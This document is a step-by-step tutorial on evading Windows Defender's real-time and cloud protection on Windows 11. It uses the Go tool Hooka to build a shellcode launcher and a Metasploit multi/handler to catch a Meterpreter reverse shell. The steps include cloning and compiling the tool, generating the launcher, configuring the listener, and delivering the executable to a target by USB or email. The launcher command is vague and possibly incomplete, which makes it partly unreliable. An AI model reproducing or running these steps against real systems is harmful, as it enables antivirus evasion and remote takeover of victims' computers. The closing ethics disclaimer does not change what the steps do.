Bypass Windows Defender 2024 (Real Time and Cloud Protection) with Hooka (Golang)

Introduction

In this tutorial, we will explore how to bypass Windows Defender on a Windows 11 machine using a tool called Hooka, written in Golang. This guide will walk you through the process of setting up and executing Hooka to create a shellcode launcher that establishes a Meterpreter reverse shell connection, all while evading the real-time and cloud protections of Windows Defender.

Step 1: Setting Up the Environment

Before you can use Hooka, ensure your environment is properly set up.

• Install Go: Download and install Go from the official website (https://golang.org/dl/).
• Clone Hooka Repository: Open your terminal and run the following command to clone the repository:

  git clone https://github.com/D3Ext/Hooka.git
  

• Navigate to the Hooka Directory:

  cd Hooka
  

• Install Dependencies: Make sure all dependencies are installed by running:

  go mod tidy
  

Step 2: Compiling Hooka

Now that you have Hooka set up, you will need to compile it.

• Compile the Tool: Use the following command to build the executable:

  go build -o hooka.exe main.go
  

• Check for Errors: Ensure there are no compilation errors. If there are issues, review your Go installation and dependencies.

Step 3: Generating the Shellcode Launcher

This step involves generating a shellcode launcher that can bypass Windows Defender.

• Run Hooka: Execute the compiled Hooka tool with the appropriate parameters to create the shellcode launcher. The exact command may vary, but it typically looks like this:

  ./hooka.exe -o shellcode_launcher.exe
  

• Verify Output: Confirm that shellcode_launcher.exe has been created successfully in your directory.

Step 4: Setting Up the Listener

To complete the reverse shell setup, you need to prepare your listener on a Kali machine.

• Open Metasploit: Start Metasploit Framework on your Kali machine.
• Use the Multi/Handler: Set up a handler to receive the incoming connection:

  use exploit/multi/handler
  set payload windows/meterpreter/reverse_tcp
  set LHOST <Your_Kali_IP>
  set LPORT <Your_Port>
  exploit
  

Step 5: Executing the Shellcode Launcher

Now, you can execute the shellcode launcher on the target Windows 11 machine.

• Transfer the Launcher: Use any method to transfer shellcode_launcher.exe to the target machine (e.g., USB, email, etc.).
• Run the Launcher: Execute the shellcode_launcher.exe on the target system.
• Monitor the Listener: Go back to your Kali machine and check if you receive a connection in Metasploit.

Conclusion

You have successfully learned how to bypass Windows Defender using Hooka and establish a Meterpreter reverse shell. This process highlights the importance of understanding security tools and their implications. Always use this knowledge ethically and within the bounds of the law.

Key Takeaways

• Ensure your environment is set up with Go and necessary dependencies.
• Compile Hooka to generate a shellcode launcher.
• Set up a listener in Metasploit to receive the reverse shell.
• Always conduct testing in controlled environments for educational purposes.